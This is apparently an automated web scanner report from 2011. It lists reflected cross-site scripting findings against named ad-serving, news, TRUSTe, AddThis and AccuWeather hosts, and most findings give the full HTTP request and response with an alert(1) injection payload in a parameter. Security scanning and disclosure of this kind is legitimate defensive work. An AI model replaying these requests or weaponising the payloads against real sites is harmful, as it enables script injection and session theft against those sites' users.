HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B8EF74BD1318423C8700FF923C3BB0EA; Path=/ Content-Type: text/javascript;charset=UTF-8 Content-Length: 737 Date: Tue, 08 Feb 2011 02:46:51 GMT Connection: close
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 455dd<script>alert(1)</script>4c15da0ec1a was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536455dd<script>alert(1)</script>4c15da0ec1a&cid=EI9-DR-Interclick&vchannel=9075&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=02E5D788C0C23C97F04D936CD6926031; Path=/ Content-Type: text/javascript;charset=UTF-8 Content-Length: 769 Date: Tue, 08 Feb 2011 02:46:32 GMT Connection: close
The value of the vchannel request parameter is copied into the HTML document as plain text between tags. The payload 8ba3f<img%20src%3da%20onerror%3dalert(1)>f9aed8b297a was submitted in the vchannel parameter. This input was echoed as 8ba3f<img src=a onerror=alert(1)>f9aed8b297a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /ads/tag.js?uid=M6uzDYEbWGBrvdnp_69536&cid=EI9-DR-Interclick&vchannel=90758ba3f<img%20src%3da%20onerror%3dalert(1)>f9aed8b297a&altbannerurl=http%253A%252F%252Fa1.interclick.com%252FgetInPage.aspx%253Fa%253D51%2526b%253D9075%2526cid%253D7645468%2526isif%253Df%2526rurld%253Dwww.nypost.com%2526sl%253Dtrue%2526dvp%253Dhttp%25253A%252F%252Fwww.nypost.com%252F%2526rurl%253Dhttp%25253A%25252F%25252Fwww.nypost.com%25252F%2526blkAdxp%253D1 HTTP/1.1 Host: ads.adxpose.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=CA4064B619F49C566DD055974ABE8B44; Path=/ Content-Type: text/javascript;charset=UTF-8 Content-Length: 730 Date: Tue, 08 Feb 2011 02:46:40 GMT Connection: close
1.31. http://adserving.cpxinteractive.com/rw [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserving.cpxinteractive.com
Path:
/rw
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5e97"><script>alert(1)</script>2d71d7d1b5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw?title=New%20offer%21&qs=iframe3%3FHQ1WAIctGAB7518AAAAAAJOJGQAAAAAAAgAAAAAAAAAAAP8AAAACFcGkJQAAAAAA3xYiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTzg8AAAAAAAICAgAAAAAAGy%2EdJAYBFkAbL90kBgEWQAAAAAAAAAAAAABQJchyE0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAChh0yu9YmZCbUZtY8cd%2EzdKjprf%2DlHY8uMhpLJAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enypost%2Ecom%252F%2CZ%253D0x0%2526y%253D29%2526s%253D1584519%2526%5Fsalt%253D4021573200%2526B%253D10%2526r%253D1%2C3a45ebde%2D3328%2D11e0%2Daebf%2D003048d6d892&b5e97"><script>alert(1)</script>2d71d7d1b5e=1 HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:07:53 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Length: 814 Content-Type: text/html Age: 0 Proxy-Connection: close
The value of the qs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb83e"><script>alert(1)</script>1c12119eb3f was submitted in the qs parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw?title=New%20offer%21&qs=cb83e"><script>alert(1)</script>1c12119eb3f HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:07:53 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Length: 353 Content-Type: text/html Age: 0 Proxy-Connection: close
The value of the title request parameter is copied into the HTML document as text between TITLE tags. The payload b58ee</title><script>alert(1)</script>a694e07824a was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rw?title=New%20offer%21b58ee</title><script>alert(1)</script>a694e07824a&qs=iframe3%3FHQ1WAIctGAB7518AAAAAAJOJGQAAAAAAAgAAAAAAAAAAAP8AAAACFcGkJQAAAAAA3xYiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACTzg8AAAAAAAICAgAAAAAAGy%2EdJAYBFkAbL90kBgEWQAAAAAAAAAAAAABQJchyE0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAChh0yu9YmZCbUZtY8cd%2EzdKjprf%2DlHY8uMhpLJAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Fwww%2Enypost%2Ecom%252F%2CZ%253D0x0%2526y%253D29%2526s%253D1584519%2526%5Fsalt%253D4021573200%2526B%253D10%2526r%253D1%2C3a45ebde%2D3328%2D11e0%2Daebf%2D003048d6d892 HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:07:52 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Content-Length: 817 Content-Type: text/html Age: 0 Proxy-Connection: close
1.34. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://adserving.cpxinteractive.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3931"-alert(1)-"9217cc6e65a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=pop&ad_size=0x0§ion=1584519&banned_pop_types=29&pop_times=1&pop_frequency=86400&f3931"-alert(1)-"9217cc6e65a=1 HTTP/1.1 Host: adserving.cpxinteractive.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 02:08:13 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Tue, 08 Feb 2011 02:08:13 GMT Pragma: no-cache Content-Length: 4401 Age: 0 Proxy-Connection: close
/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_pop_frequency = 86400; rm_pop_times = 1; rm_pop_id = 1584519; rm_tag_type = "pop"; rm_url = "http://adserving.cpxinteractive.com/imp?Z=0x0&y=29&f3931"-alert(1)-"9217cc6e65a=1&s=1584519&_salt=1433585166";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if( ...[SNIP]...
The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c74dd'><script>alert(1)</script>bdde2c185d was submitted in the CN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707c74dd'><script>alert(1)</script>bdde2c185d&SITE=NYNYP&SECTION=DJSP_COMPLETE&TEMPLATE=DEFAULT HTTP/1.1 Host: breakingnews.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: SITE=NYNYP; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Tue, 08 Feb 2011 02:26:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 08 Feb 2011 02:26:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 54267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Busi ...[SNIP]... <a href='http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707C74DD'><SCRIPT>ALERT(1)</SCRIPT>BDDE2C185D.html?CN=AP707C74DD'> ...[SNIP]...
The value of the CN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd26"><script>alert(1)</script>c57e8e6769d was submitted in the CN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /dynamic/external/ibd.morningstar.com/AP/StockMover.html?CN=AP707ccd26"><script>alert(1)</script>c57e8e6769d&SITE=NYNYP&SECTION=DJSP_COMPLETE&TEMPLATE=DEFAULT HTTP/1.1 Host: breakingnews.nypost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.3 (Linux/SUSE) Set-Cookie: SITE=NYNYP; Path=/ Set-Cookie: SECTION=DJSP_COMPLETE; Path=/ Content-Type: text/html Expires: Tue, 08 Feb 2011 02:26:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 08 Feb 2011 02:26:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 54330
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Busi ...[SNIP]... <form name="FormAPTop" method=get action="http://hosted.ap.org/dynamic/external/ibd.morningstar.com/quicktake/standard/client/shell/AP707CCD26"><SCRIPT>ALERT(1)</SCRIPT>C57E8E6769D.html" style="margin:0px;"> ...[SNIP]...
The value of the sealid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5846%20style%3dx%3aexpression(alert(1))%20a449f0c11e7 was submitted in the sealid parameter. This input was echoed as f5846 style=x:expression(alert(1)) a449f0c11e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pvr.php?page=validate&url=www.adbrite.com&sealid=102f5846%20style%3dx%3aexpression(alert(1))%20a449f0c11e7 HTTP/1.1 Host: clicktoverify.truste.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 05:46:34 GMT Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.7a PHP/5.1.4 X-Powered-By: PHP/5.1.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 8525
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" >
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Validation Page for Online Privacy Certification by TRUSTe</title> <meta nam ...[SNIP]... <input type='hidden' name='sealid' value=102f5846 style=x:expression(alert(1)) a449f0c11e7> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d6dd7<script>alert(1)</script>287b33a9360 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /red/psi/sites/www.starbucks.com/p.json?callback=_ate.ad.hprd6dd7<script>alert(1)</script>287b33a9360&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.starbucks.com%2Fsmooth&ref=http%3A%2F%2Fwww.nypost.com%2F&1c4bn7 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297025629.60|1296659685.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 281 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Tue, 08 Feb 2011 03:03:10 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 10 Mar 2011 03:03:10 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1297134190.60|1296659685.66; Domain=.addthis.com; Expires=Tue, 05-Feb-2013 18:47:55 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Tue, 08 Feb 2011 03:03:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 08 Feb 2011 03:03:10 GMT Connection: close
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 82337<script>alert(1)</script>43f7dbcf295 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.nypost.com%2F&uid=M6uzDYEbWGBrvdnp_6953682337<script>alert(1)</script>43f7dbcf295&xy=697%2C2049&wh=1050%2C1040&vchannel=9075&cid=EI9-DR-Interclick&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.1&altbannerurl=http%3A%2F%2Fa1.interclick.com%2FgetInPage.aspx%3Fa%3D51%26b%3D9075%26cid%3D7645468%26isif%3Df%26rurld%3Dwww.nypost.com%26sl%3Dtrue%26dvp%3Dhttp%253A%2F%2Fwww.nypost.com%2F%26rurl%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26blkAdxp%3D1&iframed=0 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=B21BCBC2763287B5824AD144E6A526AB; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 144 Date: Tue, 08 Feb 2011 02:46:43 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("M6uzDYEbWGBrvdnp_6953682337<script>alert(1)</script>43f7dbcf295");
The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f38a"%3balert(1)//3a4adeadc39 was submitted in the lang parameter. This input was echoed as 8f38a";alert(1)//3a4adeadc39 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng8f38a"%3balert(1)//3a4adeadc39&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 03:07:45 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n34 ( jfk-agg-n14), ms jfk-agg-n14 ( origin>CONN) Cache-Control: max-age=2700 Expires: Tue, 08 Feb 2011 03:52:45 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3919
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... ype; return ret; }
The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4da3"%3balert(1)//bd3f4a4236f was submitted in the logo parameter. This input was echoed as a4da3";alert(1)//bd3f4a4236f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1a4da3"%3balert(1)//bd3f4a4236f&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 03:07:04 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n34 ( jfk-agg-n31), ms jfk-agg-n31 ( origin>CONN) Cache-Control: max-age=2940 Expires: Tue, 08 Feb 2011 03:56:04 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3919
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... unNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1a4da3";alert(1)//bd3f4a4236f&tStyle=whteYell&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1a4da3"; ...[SNIP]...
The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c9f2f"%3balert(1)//943109294fb was submitted in the metric parameter. This input was echoed as c9f2f";alert(1)//943109294fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0c9f2f"%3balert(1)//943109294fb&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 03:08:53 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n34 ( jfk-agg-n11), ms jfk-agg-n11 ( origin>CONN) Cache-Control: max-age=3180 Expires: Tue, 08 Feb 2011 04:01:53 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3919
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... dAttrs["type"] = mimeType; return ret; }
The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 319eb"%3balert(1)//bda5567410d was submitted in the partner parameter. This input was echoed as 319eb";alert(1)//bda5567410d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather319eb"%3balert(1)//bda5567410d&tStyle=whteYell&logo=1&zipcode=10001&lang=eng&size=12&theme=lhtblue&metric=0&target=_self HTTP/1.1 Host: netweather.accuweather.com Proxy-Connection: keep-alive Referer: http://www.channel11newsreport.com/money/work-from-home/?t202id=6598&t202kw=news Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=256067995.1296754760.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/64; s_vi=[CS]v1|26A57416051D2589-4000012C8000F930[CE]; __qca=P0-1763970855-1296754771965; __utma=256067995.1249143252.1296754760.1296754760.1296754760.1
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 03:06:31 GMT Server: PWS/1.7.1.2 X-Px: ms jfk-agg-n34 ( jfk-agg-n23), ms jfk-agg-n23 ( origin>CONN) Cache-Control: max-age=2760 Expires: Tue, 08 Feb 2011 03:52:31 GMT Age: 0 Content-Type: text/javascript Vary: Accept-Encoding Connection: keep-alive Content-Length: 3919
//v1.0 function AC_AddExtension(src, ext) { if (src.indexOf('?') != -1) return src.replace(/\?/, ext+'?'); else return src + ext; }
function AC_Generateobj(objAttrs, params, e ...[SNIP]... rsion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather319eb";alert(1)//bda5567410d&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10001&customtheme=&theme=lhtblue&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=whteYell&partner=netweather319eb"; ...[SNIP]...
The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4225d"%3balert(1)//807d6220ec9 was submitted in the tStyle parameter. This input was echoed as 4225d";alert(1)//807d6220ec9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
